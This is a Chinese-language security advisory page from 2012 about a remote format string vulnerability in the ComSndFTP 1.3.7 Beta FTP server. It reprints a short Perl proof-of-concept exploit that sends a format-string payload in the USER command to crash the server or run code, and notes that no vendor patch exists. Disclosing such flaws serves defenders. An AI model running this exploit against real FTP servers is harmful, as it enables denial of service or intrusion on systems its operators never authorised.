发布日期:2012-06-07
更新日期:2012-06-28受影响系统:
ComSndFTP ComSndFTP 1.3.7 Beta
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53865ComSndFTP是适用于Windows的FTP服务器。ComSndFTP 1.3.7 Beta在实现上存在格式字符串漏洞,远程攻击者可利用此漏洞执行任意代码或造成拒绝服务。<*来源:demonalex
链接:http://www.securityfocus.com/archive/1/523019
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perl -w
#ComSndFTP Server Remote Format String Overflow Exploit
#Written by demonalex (at) 163 (dot) com [email concealed]
use IO::Socket;
$|=1;
$host=shift || die "$0 $host $port
";
$port=shift || die "$0 $host $port
";
$evil = "%s%p%x%d";
print "Launch Attack ... ";
$sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>"tcp", Timeout=>30) || die "HOST $host PORT $port is down!
";
if(defined($sock1)){
$sock1->recv($content, 100, 0);
sleep(2);
$sock1->send("USER ".$evil."
", 0);
sleep(2);
$sock1->recv($content, 100, 0);
sleep(5);
$sock1->close;
}
print "Finish!
";
exit(1);建议:
--------------------------------------------------------------------------------
厂商补丁:ComSndFTP
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://ftp.comsnd.com/FlightGear和SimGear多个缓冲区溢出漏洞多个GE Proficy产品栈缓冲区溢出和命令注入漏洞相关资讯 字符串漏洞ComSndFTP ComSndFTP漏洞 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|